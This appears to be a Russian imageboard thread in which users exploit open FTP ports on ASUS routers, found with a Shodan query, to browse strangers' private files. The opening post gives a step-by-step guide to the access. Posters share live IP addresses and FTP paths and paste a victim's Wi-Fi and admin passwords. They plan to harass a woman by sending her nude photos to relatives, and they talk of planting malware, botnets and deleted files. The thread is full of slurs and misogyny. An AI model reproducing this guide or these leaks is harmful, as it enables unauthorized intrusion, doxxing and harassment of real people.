Не смейте травить охуительную милфу, аутисты. Это лучшая любительская фотосессия, которую я видел.
шлюха же какая то
А вишмастер так закинуть можна?
Разве это так заёбисто? она ведь не хекка
Позировать для мужа голой = шлюха?
>милфу
ищите родственников, детей, начальство. ей то зачем?
Думаю, им уже не раз майнеры и бот неты закидывали. Уязвимости уже несколько лет.
Не думал, что Asus такое днище
Да. Ноль реакции.
А то она их не видела
Нет, я ещё другие смотрю.
Да и зачем ей то отправлять? Думаешь она себя не видела?
на весьинтернет, да! нужно срочно оповестить друзьяшек во вкудахте
>детей
Этот Мсье знает толк в травле
Нахуй её травить? Одно дело словить мелких лулзов, другое расшатывать нервы ни за что.
>Возраст: 37
Точно не студентка
Вы ебанутые, по ссылкам какая-то всратая милфа, здесь тне лет 25
Юль, ты?
Так она "массажистка" = угадайте кто
На бутылку присядете. Не делайте этого, анончики, подумайте.
Фотографиям уже лет 10, алло.
Лулзов 0, чем она тебе не угодила? Всё потому что пизда между ног?
Как вы туда папки и файлы добавляете? Тоже хочу постить гомонигр и паки цп
Массажистка?
А ведь норм баба.
1. Приятная внешность.
2. Отличная профессия.
3. Не зашаренная.
4. Ходит в походы, лазит по скалам, наряет с аквалангом.
Повезло кому-то.
1. Приятная внешность.
2. Отличная профессия.
3. Не зашаренная.
4. Ходит в походы, лазит по скалам, наряет с аквалангом.
Повезло кому-то.
Бля, против травли. Ничё плохого вроде не сделала. Или того, что сделала себе ню-фотосессию, достаточно? Поясни, анон
СКАЧАТЬ ФИЛЬМЫ В ХОРОШЕМ КАЧЕСТВЕ БЕЗ СМС
188.26.247.103
188.26.247.103
это ж не она. это похоже владелица кабинета. а наша мимопроходила не?
Долбоебы, сЕр.
предлагаю требовать больше фоток у нее. пусть выполняет реквесты чтоб пак не ушел никуда
куда я блять попал)
>Массажистка
Оу, и действительно нет такого слова. "Массажист", который делает массаж за 3000 рублей в час.
Цыгане?
блэдь корейцы там есть цп))
годно придумал. но вроде это не она массажистка. не похожа
Помню к какому-то китайцу на ком залез, там были скрытые съёмки его одноклассниц в столовках пока те не видят, а ещё музычка всякие слипкноты и записи лайвов. Я тоже был говнарём и извращенцем и после этого не хотел больше никого хакирить.
америка
Надо было бабки с него трясти, угрожая раскрытием данных. Эх ты.
Сук, не нашел
Только что смотрел все ip
>Эти лица
та я пошутил, у этого ебучего корейца онли аниме там
да у косыхъ бы расстреляли точно
Она уже не первой свежести. Поздно надумали.
У всех корейцев хуйня. Ничего не нашел.
Слишком правильные
Бля, хуйню снес. Наша красотка там не работает, диплом не ее, но, вполне вероятно, ее подруги-массажистки.
У этого армянина ничего интересного,базарю. Перекачал все фото. Только фото паспорта жены есть. В папке АННА, кажется. Короче, зря время потратил.
Американские арийки, хули.
Блядь! Травля это не наказание за что-то, а просто потому что. Мы можем? Мы можем! Так хули б нет?
ага, надо б пробить
Это Япония, а не Корея.
Хм. Ты можешь воткнуть раскаленную арматуру себе в жопу, но не делаешь этого. Почему?
Надо было фотку отфотошопить типо одна с тех тянов говорит в облачке - закрой доступ, мудило
Потому что не хочет? Не?
Ну а хули б нет?
"Потому что можем" это хуевая причина.
Бочку
давайте проголосуем, кто за травлю? хотя это не она,
надо сперва пробить ее аккаунт
надо сперва пробить ее аккаунт
Потому что я не долбоёб.
А вот я могу, в переносном смысле, воткнуть раскалённую арматурину кому-то другому в жопу и буду громко хохотать, глядя как он бегает, пытается потушить пердак и оправдываться, что мол это не арматурина у меня в жопе и вообще это не моё.
Мачиратор!
Её достаточно. И ты тут ничего не поделаешь. Может и хочет. Всё совпало, он в ударе, все довольны. Ну кроме мадам, ну и тебя.
я б на такой вечеринке поучаствовал
Я за. Почему? Потому что мы можем.
Ждет своего анона
Годнота. Шишка в небесах.
мне уже жалко свой хуй.
Еще есть сиськи этой самой Анны, но качество ж бля.
>Травля это не наказание за что-то, а просто потому что
Тгавля и происходит за что-то. Обычно "бывшие звёзды" очень много рассказывают окружающим о себе и это не является действительностью. В их случае за лицемерие а эту тян бессмысленно заёбывать, ведь тгавля то ведётся ОКРУЖЕНИЕМ а не школьником из дома. Посмотри на себя со стороны, будешь выглядеть как долбаёб который пытается в ??шантаж?? приватными фотками. Теперь до тебя дошло?
Тут на день победы Егорку из Минска травили тоже не за что. Откуда нам знать, может она делала фотосессию для сайта эскорт-услуг?
Будут ее травить или нет мне не особо важно, но если будут конечно хотелось бы,чтобы мягенько, без оскорблений родителей, а просто порассылали фотки ради лулзов.
Все-таки надо быть добрее, не оскорблять девушку за то, что она позволила Анончикам полюбоваться своими формами. Тем более она ведь никуда эти фотки не выкладывала
Да и поговаривают, что фоткам лет 10. Может findface поможет?
Хуйня.
А кто снимает?
>Тгавля и происходит за что-то.
Съеби уже на пикабу, хуйло ньюфажное. Поссал тебе и твоей мамаше в ротешники. Почему? Потому что могу.
Глотай.
Я за, но участвовать не буду. Только морально поддерживаю.
Муж же.
this
Дочь
Ну ёбана блядь.
Ты туда съебисб
Ебать он куколд.
Так и знал, что наёб.
студия это, лол
Хотя, я попробую подменить какойто екзешник на ботнет
КАК ПРОСМАТРИВАТЬ ФАЙЛЫ????
Вишмастер блять скачай, даун
бля это моя мамка
Двощи, многие наверное заметили что какой-то пидор среди нас запихивает в фтпшники Photo.scr и прочую хуету из разряда мамкиных хакиров вирусов. Предлагаю декриптовать бэкдор и по обращению к IP наказать пидора
Бля куда не зайду везде анон уже побывал
Да мне похуй как я буду выглядеть. Я вообще никак не буду выглядеть. Я аноним, меня вообще нет.
я тоже за, хули. кого только травить?
Потому что суёшься в ссаные рашки-украшки. Пиздуй в Канаду, Швецию, США, Австралию.
Ты долбоёб.
Поддерживаю, но как обращения просмотреть?
ряяяя уу меня линукс!!!
>Photo.scr
я как будто за ним иду)
Это же скринсейвер.
Чому куколд? Не с мужиком же она ебётся.
Латынина Юля?
Двачую. Совсем охуел, сука.
Против. Тупо и попахивает банальной завистью. Когда живодёрок или школьников охуевших травят - это пиздато и полезно. Здесь - тухло и бессмысленно.
Да нахуй. Чот 99% - пустые папки, программки, фото_хуя_осла
Ничего интересного.
Прижигает видимо чтото :B
>среди нас
ты на дату файла посмотри, это пидор раньше всех заливает за несколько дней, причем сканит явно не руками, сомневаюсь что он здесь сидит
хаха, прям так и открою, ага щас
В архивач никто не сохранял, что ли?
А то не могу понять, что за Гена, это вот этот что ли???
А то не могу понять, что за Гена, это вот этот что ли???
Лол. Ты противоречишь здравой логике. Тгавить да это травлей даже назвать нельзя рандом пизду за откровенные фото, рассылая их друзьям?
Это даже хуже, чем с мужиком.
прошли уже рекурсивным делитером, лол
Чому это?
Да. Почему нет?
кандиломы поди
аноны, а поясните дауничу: ну вот я вижу всякое файло по разным адресам, а как что ниб свое туда скидывать, или что то стирать?
Так вбей в долфин или тунар адрес, долбоеб.
> Я аноним, меня вообще нет.
Тогда завали ебало и сиди ридонли а не выдвигай свои гениальные идеи.
Против оскорблений, но за рассылку фотографий just4fun
Охуенно, закрыл свой рутер. Шарятся они, пидоры.
Естественно ОП идею с форчана спиздил или еще где. Двощ в посленюю очередь узнает.
Признайтесь сколько анонов тут было?
Зашёл на фтп китаёзы. У него уйма фильмов >1гб. Тэгово похоже на китайский прон. Может кто лучше определит. ИП прилагается сверху слева.
Он тупой немного, забей. На кой метать бисер перед свиньями?
Пошёл ты нахуй, пидорасина! Хочу - и выдвигаю!
test
Да он
Ты совсем дебил? Ебаца это не плохо.
ТАК ВБИЛ И ХУЛЕ НЕТ? Я С ДАК ДАК ГО
>Признайтесь сколько анонов тут было?
Потому, ёпта.
я повторюсь, идея ПИЗДЕЦКИ СТАРАЯ
просто загугли фразу ASUS 230
Нет ты. А он может.
PREPARE YOUR ASUS
Тут уже проинспектировали все кому не лень, нихуя интересного.
Мать твою ебал в ванной, а рядом плавала резиновая уточка.
Это Япония, а не Китай. Анта бака?
Ну тогда не получится травли, если фоточки раскидаем. Хуль ты бугуртишь?
Как схоронять фотки и доки??
Кто такой, чем знаменит?
>2013
Пиздец...15 год
ШКОЛЬНИКИ НА ДВОЩАХ ОТКРЫВАЮТ СЕКРЕТЫ ХАЦКИНГА И ТГАВЛИ
Сопоставимо только с тем долбоёбом который стримил на ютубе эксплоит медиагет
А потом он сел на бутылку.
Против. Потому что травля - типичное грязное пидорашье развлечение, а я не люблю пидорашек.
>006 ГОМОНИГРЫ
Какой аккуратный педантичный анон, порядок любит
да ладно,я понял
Его акк одним из первых раздербанили сегодня на дваче
ЕЕЕЕ ИЛИТА В ТРЕНДЕ
100% НЕПИДИРАШКА
Хотел бы взглянуть.
Это он автор про осла?
шишак дымится, оче
Слева черная рубашка это не цыган с КРЕОСАН? :D
не, у него только фотки с мамкой и картинки на подрочить с бэкапа телефона
Черт возьми, а я думал, почему так долго роликов нет? А он опять со своим табором.
Любой эфтипи манагер
В гомопотягушки играет негодник
>который стримил на ютубе эксплоит медиагет
А мне понравилось. Все новое - хорошо забытое старое.
Война анонов на чужом компе)
Сука, можно же разбогатеть нихуйово.
Няши.
Тупым и нищим харкачером завидно же, ну
Мы в 12-13м году RMS сували через 7zip, было смишно. Но когда это выходит в просторы двоща и школьники просто сатанеют идеей тгавли простых людей - это не кошерно совсем
Ну вот зачем делать такие фото?
годнота поъехала
Только что там был
>северная
Всегда читаю как серверная
война уровня \б
не удивлюсь если это один анон всё писал
Для анона
95.84.200.38
>95.84.200.38
Все на позиции!
Для воспоминаний. Сидишь ты такой вечером а передёрнуть на прон не хочется а память она получше кинца будет.
жопа вроде пышная раком пойдет выебать
Нихуя себе, криогенные камеры запущенные в девяностых начали размораживать?
На даунов похожи
Да это пидорашки какие-то.
Как добавлять папки и файлы? Хочу подбрасывать людям порно
В этом мне и приглянулась идея таких вот развлекательных стримов, которые проще употребить, чем идти разбираться самому.
Эх, много лет назад, когда мэйловый мой мир был жив, помнится, собирал аккаунты через секретный вопрос. Хорошо запомнил, когда сидел из-под тяночки, мне написал хач, заявив, что хочет мне отсосат трусы.
Судишь по первым попавшимся знакам каны?
другой анон
Короче по России уже нету смысла чекать, аноны все засрали
Как минимум, я ещё пару кандзи узнал.
Нужно пройти путь джедая в течении 30 лет, либо использовать гугл
как закидывать свои папки анон?
травля иностранца в послужном списке анона случалась? снг не считать
А ты написать не можешь??? А? А?
телок голых пости зачем нам тут собаки зоофил блять
двачую, совсем ахуел
Какой бы вдул, Антош?
Эта хуйня лишь на Анусы?
ftp клиентом наверное
Кстати, мой брат покупал роутер от АНУСА, к которому также подключён и я (по Wi-Fi), но хорошо то, что своего айпи я на сайте не нашёл.
слюаки с телками тоже подходят
Бля, у посона то ГИПЕРТОНИЯ, откинуться может.
уебанки какие то
Нет
никакой
СРУ ЗЕ ГЕЙТС ОФ ХЭЛ
Скрин не мой, спиздил на пикабу, но сука ор же))
милфе
алсо кандидоз в паху, чухан ебаный.
Быдлохохол простой.
Пиздец, как же я отупел. В первом абзаце я хотел передать мысль, что вынесение таких мероприятий за скобки этого раковника, снижает их неадекватность.
>травля иностранца в послужном списке анона случалась?
До фтп анон терроризировал разных иностранцев, печатая всякую хуйню на принтере. Кстати, их таки уже совсем не найти ?
А вот ему бы я на стену скинул эту фотку
Как переименовывать?
Круглому ебалу слева.
ftp://151.45.129.144/volume(sda5)/Hacking/
У нас тут итальянский хакер
У нас тут итальянский хакер
принтеры или иностранцев?
Как переименовывать или добавлять?
особенно когда ему там все постирают и понапишут гадостей в папках !
Взлольнул. Так же можно было гоатсе распечать.Жаль не видно результат своего труда
Принтеров
значит надо его сдеанонить поддержать.
Из-за чего это вообще происходит? В чем проеб?
До первой волны можно было врубать почти на всех принтерах печку и становиться поджигателем. Наверняка, среди эксплуатируемых ныне есть экземпляры, подверженные такой шалости.
В САУНУ СЕГОДНЯ
@
ПРИХОДИ - ПРИХОДИ
>port:21 tp-link 230
☹
>Please purchase a Shodan membership to access more than 5 pages of results.
ПРРРРРРРРРРР ФРРРРРРРРРРР
ПРРРРРРРРРРР ФРРРРРРРРРРР
блять не могу зарегаться. ели кто может дайте аккаунт пожалуйста. если он дает доступ к вашим файлом то не буду наглым не надо. просто сам сайт впервые вижу. пожалуйста, анон
огонь
О - Омск
Уважаемые товарищи хакеры, объясните суть эксплоита. Может тоже подключусь, раньше ахуенно было радмины сканить.
ебать толсто, пики гуглятся
Через лицекнигу или гуголь можно зайти
куда пропали то? где годнота?
Поищи
hp 80
xerox 80
ricoh 80
Можно было даже на дисплей выводить разную дичь, чекайте.
https://geektimes.ru/post/285540/
Вы только посмотрите, какая крыса.
Бля, а он красивый
Проеб в открытом на распашку для любого из интернета 21-ом порту. Это как вай-фай без пароля
Пососал бы?
спасибо, анон
ftp://serph77777.ddns.net/volume(sda5)/20140831_062221.jpg а чо это за HEX на фото
Алло, вас разводят
то есть потравить таки можно владелицу кабинета массажа за то что блядям всяким свой массажный стол сдает, на котором потом интеллигентным людям массаж делают?
Не только + отключены все средства безопасности системы при включенном DMZ который нахуя то вообще делают. Так же, инженеры ростелекома/билайна не забывают включать доступ из вне.
Сцука, ебучие канадцы! Полчаса тянул видос из папки с названием "homemade pron", и хули? Там не цопе и даже не жирные карлики-пенсионеры. Там просто слайдшоу какого-то хуя с его пиздой под какой-то сопливый роцк. Даже не порнушное ни разу.
Пидарасы, сука!
Пидарасы, сука!
аноны, считается ли просмотр и загрузка файлов с чужого компа без его ведома приступлением? юрист-кун, ты нужен.
пусто на всех трёх
То ли город прошареный, то ли наоборот.
>Как переименовывать
Качни Total commander, или любой ftp клиент.
ПУТИН, ВВЕДИ ВОЙСКА!
а ты скажешь в суде что тебе просто ссылку кто-то кинул в почту а ты по ней пошел....
Да просто не шарься по пидорашьим компам, если ссышь и всё.
Конечно.
BATYA
Охуенно! Тян любят плохих парней.
Тащемта покупаешь ноут с рук, не попадаешься на камеры при покупке, потом идешь в людное место, подключаешься к бесплатному вай-фаю и кидаешь на эти пекарни негров и тебя не спалят. Ноут каждый день нужно новый покупать.
4й слева наверн, остальные пусть смотрят и грустят(
> Тян любят плохих
Не плохих а мудаков они любят.
Я думаю шариться как крыса по чужим компам - это достаточно мудацкий поступок.
findface в помощь
дерзай. заодно перекатишь тред
Похавал такой... и приносят тебе счет, збз
>аноны, считается ли просмотр и загрузка файлов с чужого компа без его ведома приступлением? юрист-кун, ты нужен.
просмотр нет, загрузка и изменение да, там выше кидали статью.
Но если ты нет заявления в полицию то всем пох, а заявление напишут только если спиздишь данные карт или расфорсишь голые фотки
кек
В этом нет ничего плохого.
>4)Фильтруем по стране/городу/провайдеру
где это блядь? У меня просто список с рандоных стран
4 пункт - отсев тупоголовых, ага.
Хакер уровня /б/. Особенно порадовал файл password.
Password Wifi Casa: gallipoli2016
Password WifiGuest Casa: giulia2014
Nome Utente Casa: admin
Password Casa: 33575dufruffo
Password Wifi Negozio: giulia2014
Password WifiGuest Negozio: gallipoli2016
Nome Utente Negozio: admin
Password Negozio: giulia2014
IL WEBMASTER
destiny 33575dufruffo
>ftp://+адреса
Да я вижу, что там страны, но там рашка, сша и китай, нахуй мне они, хочу посерфить украину, а ее в опциях нету, и еще, какие нахуй адреса?
Ну вообще я бы не хотел, чтобы какие-то хуи потными ручонками перебирали мои семейные фоточки.
Или удолили бы к хуям все 350 гигов музла.
А ты выбери страну любую, посмотри в строку поиска и подумой.
Такое развлечение интересно только лохам. Об их колечестве говорит тред.
Пасиба. Че там дальше? Как комп ЕОТовой взломать?
Я твою мать хуем осла ебал, петушара.
ммм халявная музычка
>Как комп ЕОТовой взломать?
Идёшь к ней домой, даёшь ей по щщам, чтобы она вырубилась и всё.
Хрень, в чем тогда смысл взламывать рандомов?
а что тебе интересно? роллить?
Ммм. Халявные логины и пароли.
лет 10 назад я по таким фтп музыку и скачивал
> в чем тогда смысл взламывать рандомов?
Пошарится у на компах рандомов. Ты же хочешь пошарится на компе еот
>скриншотс
интересненько
Но ты все-равно лох. Как ты живешь?
Так а как ее комп сдетектить? Вписать улицу, провайдера? Что?
Угадай страну по ебасосам.
>чтобы какие-то хуи потными ручонками перебирали мои семейные фоточки
Ты много о себе думаешь. Всем плевать кто ты, главное приноси лулзы и это развлечение веселит тебя максимум вечер.
>Или удолили бы к хуям все 350 гигов музла.
Это может сделать только школьники или совсем долбаёб шобы было.
Ведь аноны тоже хотят чтобы их замеитили а не делают всё тихо и ускоряют обучение различных долбаёбов.
Сша-Австралия
Треды, подобные этому, или травли потерявшего мобилу придурка, собирают множество лохов. Двач состоит из лохов почти полностью.
Зубы как бы дают о себе знать.
мужык, ты зря стараешься, во-первых: ты не попадешь в цитаты баш.орг; во-вторых: 2017
cad but true
У этой шодав все первые пять страниц бесплатны, а из доступного тухлятина, фотки за 2012й год, как-то не интересно, это уже всё давно облазили, не стать первооткрывателем
Ну, значит ты целенаправленно зашел в тред к "мудакам", зная, что тут будут выкладываться фотографии. Кто ты после этого, если не лицемерный мудак?
У австралийцев оранжевая кожа?
Поздравляю всех, кто зашел на этот сайт с техники ASUS. Вы в списках
Пиздец, я только нажал скачать и ошибка 421.
У меня Dell
Я тебя люблю.
на отчисление?
В каких списках?
>>153088148
ОП, создавай перекат!
ОП, создавай перекат!
ОП, создавай перекат!
НА 4 ПИКЕ НЕ ВИДНО ФОТОГРАФА С ЗЕРКАЛЕ, ЕБАТЬ КРИПОТА
Ждите гостей из полиции, мамкины хакиры.
У него логины и пароли от сбера и киви кошелька. Пиздец.
Twich
Login:iziZoom
Зовут его Семён и он влюблён...
А вот и деанон подоспел.
23.142.64.154 (Russia, Moscow)
Выкладывать дальше?
23.142.64.154 (Russia, Moscow)
Выкладывать дальше?
Новых лохов
Смотреть можно законно, товарищ майор.
Диванон по ип адресу? Может погадаешь лучше на нём?
В базу сайта что ли попали? Ну так похуй, если порт закрыт.
https://pentest-tools.com/
Тут можно протестировать свои порты на открыт/закрты, брат жив, зависимости нет
Тут можно протестировать свои порты на открыт/закрты, брат жив, зависимости нет
Как прверить закрыт или нет
ЦоПэ!
Зарепортил
Если не хочешь, чтобы перебирали твои фоточки:
1. Не делай фоточек
2. Не сохраняй фоточки непонятно где
3. Не покупай роутеры ASUS
4. Храни фоточки под паролем
5. Храни фоточки в облаке, а не на компе
6. Юзай огоньстена
Это равносильно оставленной нараспашку двери и осуждению всех, кто зашел поглядеть, что в хате.
Через 2ip
>5. Храни фоточки в облаке, а не на компе
icloud внутри
ммм датабазы
thx
Это не гена
Гомонигры так органично смотрятся, что едва ли их даже заметят.
Отличная идея хранить пароли в файле под названием "пароли". Равносильно надписи "заначка" со стрелочкой в квартире, чтобы домушники не напрягались.
Че в айклауде интересно? Отвязывать будешь?)
5.228.17.35
есть mlp и СВАТЫ кому интересно
есть mlp и СВАТЫ кому интересно
>Если не хочешь, чтобы перебирали твои фоточки:
Для этого можно иметь голову на плечах и не отключать сетевой экран а с ним и доступ анонима
>Шапку не делал, чтобы раки не набежали
КрасаФчик!
2010 Года эти фотки по метаданным снимка ебанат.
Да я и сам выложил парочку. Оно ведь как: с точки зрения питурда ничего особенного не происходит, наоборот весело. А с точки зрения нормального человека какие-то дегенераты копаются в чужом грязном белье. Ну, согласно второй точке зрения, я таки мудак.
Двач пиздец, снова опустился на ДНО.
Нахуй их искать? Они могут фотать себя с дилдаками или голыми - это их право и не говорит о том, что они какие-то шлюхи. Если им писать и говорить, что мы нашли твои фотки, то она по-любому заяву накатает и будет права.
Нахуй их искать? Они могут фотать себя с дилдаками или голыми - это их право и не говорит о том, что они какие-то шлюхи. Если им писать и говорить, что мы нашли твои фотки, то она по-любому заяву накатает и будет права.
Ага, полиция наверное тор научилась взламывать?
>Храни фоточки в облаке
Может сразу товарищам майорам всех полиций и спецслужб разослать?
ТНУС даже врата ада засрали. Ужас!
unsupported protocol scheme "ftp" вылезает теперь, как быть ?
сука мразь уебок нахуй ты удалил музычку
чтоб ты сдох чтоб мамку твою изнасиловали нигры
чтоб твой батя порвал тебе жепу уебок
пидор
чтоб ты сдох чтоб мамку твою изнасиловали нигры
чтоб твой батя порвал тебе жепу уебок
пидор
Это майнер говнокоинов
Поясните дауну как редактировать файлы
>делаешь сложные пароли
>хранишь в открытом доступе
Что со стопами? Это лечится?
предыдущий https://2ch.hk/b/res/153073640.html
На фоне всеобщей истерии заражения вирусами, некоторые люди расшаривают свои личные данные.
Получить эти данные можно в открытом доступе, без специальных приложений, все равно что зайти к человеку на страничку.
1)Идём на shodan.io
2)Регаемся
3)Забиваем в поиск "port:21 asus 230"
4)Фильтруем по стране/городу/провайдеру
5)Вбиваем в адресную строку "ftp://"+адреса
6)???
7)Профит!
Для тех, кто нихуя не понял: в сети овердохуя открытых ФТП, через которые можно получить доступ к жёсткому диску компа, предположительно асусовский проёб.
Интересные фото/видео/документы кидаем ИТТ.